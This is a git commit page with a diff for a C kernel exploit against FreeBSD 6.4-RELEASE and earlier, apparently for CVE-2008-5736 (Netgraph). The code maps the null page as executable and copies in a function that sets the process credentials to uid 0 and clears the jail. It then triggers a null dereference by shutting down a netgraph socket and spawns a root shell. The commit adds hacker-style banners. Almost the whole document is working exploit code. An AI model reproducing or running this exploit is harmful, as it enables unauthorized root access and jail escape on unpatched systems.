diff options
| author |   Jason A. Donenfeld <Jason@zx2c4.com> | 2011-02-26 21:57:37 -0500 |
|---|---|---|
| committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2011-02-26 22:03:28 -0500 |
| commit | 60cecd4a4ec67109f421ffd7ebb00589e30f0cf8 (patch) | |
| tree | de6f2b876e1f3b601f3e698a7d855c60a56443b9 | |
| parent | Since the template search is a little buggy and sometimes causes panic, just do a more traditional UID=0 for the current thread and then execl sh into the process. (diff) | |
| download | CVE-2008-5736-60cecd4a4ec67109f421ffd7ebb00589e30f0cf8.tar.xz CVE-2008-5736-60cecd4a4ec67109f421ffd7ebb00589e30f0cf8.zip | |
Clean up headers. Make l33t.
| -rw-r--r-- | current-thread-exec.c | 73 |
1 files changed, 41 insertions, 32 deletions
diff --git a/current-thread-exec.c b/current-thread-exec.c index 9f2f7b2..1bf6dbd 100644 --- a/current-thread-exec.c +++ b/current-thread-exec.c @@ -1,83 +1,92 @@ #define _KERNEL -#include <sys/param.h> -#include <sys/mman.h> +#include <sys/types.h> #include <sys/time.h> -#include <sys/stat.h> +#include <sys/param.h> #include <sys/proc.h> #include <sys/ucred.h> -#include <sys/types.h> +#include <sys/mman.h> #include <sys/socket.h> #include <netgraph/ng_socket.h> -#include <unistd.h> -#include <stdlib.h> #include <stdio.h> -#include <errno.h> +#include <unistd.h> #define PAGES 1 -typedef unsigned long ulong; -typedef unsigned char uchar; - -int -x(void) +volatile int got_root = 0; +int root(void) { struct thread *thread; - asm( "movl %%fs:0, %0" : "=r"(thread) ); - thread->td_critnest = 0; thread->td_proc->p_ucred->cr_uid = 0; thread->td_proc->p_ucred->cr_prison = NULL; - + got_root = 1; return 0; - } -int -main(int argc, char * argv[]) +int main(int argc, char *argv[]) { - uchar * c; - uchar * d; - void * v; + unsigned char *c; + unsigned char *d; + void *v; int s; + fprintf(stderr, "~ FreeBSD <= 6.4-RELEASE Netgraph Exploit ~\n"); + fprintf(stderr, "~~~~~~~~~~~~~~~~~ by zx2c4 ~~~~~~~~~~~~~~~~\n"); + fprintf(stderr, "~~~~~ greetz to don bailey, edemveiss ~~~~~\n\n"); + + fprintf(stderr, "[+] mmapping null page\n"); v = mmap( NULL, - (PAGES * PAGE_SIZE), + PAGES * PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_FIXED, -1, 0); - if(v == MAP_FAILED) { - perror("mmap"); - return 0; + if (v == MAP_FAILED) { + perror("[-] mmap failed"); + return -1; } + fprintf(stderr, "[+] copying pwnage into null page\n"); c = v; - d = (uchar * )x; - while(1) { + d = (unsigned char*)root; + while (1) { *c = *d; - if(*d == 0xc3) + if (*d == 0xc3) break; - d++; c++; } *c++ = 0xc3; + fprintf(stderr, "[+] opening netgraph socket\n"); s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA); - if(s < 0) { - perror("socket"); - return 1; + if (s < 0) { + perror("[-] failed to open netgraph socket"); + return -1; } + fprintf(stderr, "[+] triggering null dereference\n"); shutdown(s, SHUT_RDWR); + if (!got_root) { + fprintf(stderr, "[-] failed to trigger pwnage\n"); + return -1; + } + + fprintf(stderr, "[+] elevating permissions\n"); setuid(0); setgid(0); + if (getuid() != 0) { + fprintf(stderr, "[-] failed to get root\n"); + return -1; + } + + fprintf(stderr, "[+] got root!\n"); execl("/bin/sh", "sh", NULL); return 0; |